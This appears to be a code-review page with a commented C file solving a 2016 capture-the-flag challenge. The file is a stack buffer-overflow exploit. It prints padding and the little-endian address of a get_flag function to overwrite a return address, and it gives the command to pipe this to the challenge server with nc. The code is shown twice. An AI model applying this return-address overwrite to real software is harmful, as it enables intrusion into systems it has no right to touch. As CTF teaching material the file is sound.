charles-l · April 14, 2016 05:34 · sudhackar · Apr 14, 2016
diff --git a/exploit.c b/exploit.c
 #include <stdio.h>

 // TO RUN EXPLOIT (this file just generates the junk needed to overflow to the return address):
 // cc exploit.c; ./a.out | nc problems2.2016q1.sctf.io 1337

 int main() {
    // EIP points to the current stack frame (so we want it to point at get_flag)
    //
    // We can do this by overwriting the old return address with the address for get_flag
    // (which you can get by running `pd 1 @ sym.get_flag` in radare)
    //
    // STACK:
    // /-------------------\
    // |   ... stuff ...   |
    // |-------------------|
    // |(RETURN ADDRESS)   |
    // |-------------------|
    // |(SAVED EBP)        |
    // |-------------------|
    // |(LOCAL VARIABLES)  |
    // \-------------------/
    //
    //
    // Buffer is 60 characters long (including null terminator). I don't think(?) there
    // were any other local variables, but if there were, they got overwritten. I pretty
    // much bruteforced the number of characters I need to overflow to the return address.
    //
    for (int i = 0; i < 20; i++)
        putchar('I'); // get initial junk out of the way

    // this fills in the old EBP (i think :P - 4 bytes = 32 bit address right?)
    printf("AAAA"); // this is more junk

    // You have to encode get_flag function address as the actual byte values
    // (i.e. you can't just make a string that says "0x08048f0d", since that would still be
    // ascii)
    //
    // The address is backwards because addresses are little-endian (i think?)
    // Address for get_flag: 0x08048f0d
    //                         ^ ^ ^ ^
    //                         | | | |
    //                    /----/ | | |
    //                /---|------/ | |
    //        /-------|---|--------|-/
    //        |    /--|---|--------/
    printf("\x0d\x8f\x04\x08");
    return 0;
 }
	#include <stdio.h>

	// TO RUN EXPLOIT (this file just generates the junk needed to overflow to the return address):
	// cc exploit.c; ./a.out \| nc problems2.2016q1.sctf.io 1337

	int main() {
	// EIP points to the current stack frame (so we want it to point at get_flag)
	//
	// We can do this by overwriting the old return address with the address for get_flag
	// (which you can get by running `pd 1 @ sym.get_flag` in radare)
	//
	// STACK:
	// /-------------------\
	// \| ... stuff ... \|
	// \|-------------------\|
	// \|(RETURN ADDRESS) \|
	// \|-------------------\|
	// \|(SAVED EBP) \|
	// \|-------------------\|
	// \|(LOCAL VARIABLES) \|
	// \-------------------/
	//
	//
	// Buffer is 60 characters long (including null terminator). I don't think(?) there
	// were any other local variables, but if there were, they got overwritten. I pretty
	// much bruteforced the number of characters I need to overflow to the return address.
	//
	for (int i = 0; i < 20; i++)
	putchar('I'); // get initial junk out of the way

	// this fills in the old EBP (i think :P - 4 bytes = 32 bit address right?)
	printf("AAAA"); // this is more junk

	// You have to encode get_flag function address as the actual byte values
	// (i.e. you can't just make a string that says "0x08048f0d", since that would still be
	// ascii)
	//
	// The address is backwards because addresses are little-endian (i think?)
	// Address for get_flag: 0x08048f0d
	// ^ ^ ^ ^
	// \| \| \| \|
	// /----/ \| \| \|
	// /---\|------/ \| \|
	// /-------\|---\|--------\|-/
	// \| /--\|---\|--------/
	printf("\x0d\x8f\x04\x08");
	return 0;
	}